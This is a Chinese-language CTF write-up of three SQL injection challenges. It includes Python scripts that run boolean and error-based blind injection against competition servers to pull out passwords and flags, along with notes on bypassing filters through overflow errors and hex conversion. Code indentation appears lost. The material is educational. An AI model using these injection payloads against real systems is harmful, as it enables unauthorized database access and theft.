三道sql注入题,涨姿势.
部分代码审计,实际上就是要对hi
进行bool盲注,如果分数更新了,就说明注入为真.
#hi = where ord(mid((select group_concat(user())), 1, 1)) > 0 &flag=55553
import requests
url = 'http://47.97.168.223:23333/'
ans = ''
flag = 153333
mid = 0
for pos in range(10,15):
l = 0
r = 127
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"}
mid = 0
x='1234567890qwertyuiopasdfghjkl;zxcvbnm,._/QWERTYUIOPASDFGHJKLZXCVBNM'
for j in range(0,len(x)):
flag = flag + 1
data = {'hi': ' where mid((select group_concat(password)) ,' +str(pos) +', 1) like '+hex(ord(x[j])), 'flag': flag}
resp = requests.post(url,data=data).text
if str(flag) in resp:
ans = ans + x[j]
break
elif str(flag-1) not in resp:
j = 0
print pos
print ans
#venenof7
#he3l3locat233
mid
被过滤了,还有几个数字也被过滤了,可以用conv
搭配hex
将每一位转换成16进制,再*flag
,回显即是每一位转成数字后的结果,逆推一下就知道了.
import re
import requests
_target = 'http://47.52.137.90:20000/'
def extract_points(html):
return re.search(r'My Points \| ([0-9]+)
', html).group(1).strip()
def get_pw_len():
d = {'flag': '1', 'hi': '*length( pw )'}
resp = requests.post(_target, data=d)
return int(extract_points(resp.text))
flag = ''
for i in range(1,get_pw_len()+1):
d = {'flag': '1', 'hi': '*convert(hex(substr( pw ,0b{0:b},1)),signed)'.format(i)}
resp = requests.post(_target, data=d)
flag += chr(int(extract_points(resp.text), 16))
print flag
print '[+] flag: N1CTF{{{}}}'.format(flag)
fuzz后发现能过滤的都过滤了,数字只剩下2和9,还有select
,if
可用,更不同的是,这次的分数看不到了,只能根据报错sorry
进行盲注.有个坑人的地方在那边的sorry
非常小,比赛时根本没看见,还以为报不了错 :P
1.整形溢出报错
*
+
2.类型转换导致unsigned出现负号致使报错
^
3.浮点数报错
double的范围:-1.79E+308 ~ +1.79E+308
^(取反)
import string
import requests
import sys
flag = 0
url = "http://9ec20782e7c14e2bac67c9bde95b39e39c887ccc4d314867.game.ichunqiu.com/"
data = {'flag': flag}
proxies={
'http':None,
'https':None
}
index = 1
ans = ""
while True:
for i in string.ascii_letters:
data['hi'] = "|if((select pw)>'%s',2,999999999*9e299)" % (ans + i)
result = requests.post(url, data=data,proxies=proxies)
if i=='Z':
exit()
if 'sorry' in result.text:
ans += chr(ord(i)-1)
print ans
sys.stdout.flush()
break
注意最后一位把g还原成h即可
http://hackermio.me/2018/04/21/BCTF-Web-Writeup/
http://f1sh.site/2018/04/22/bctf-love-q-writeup/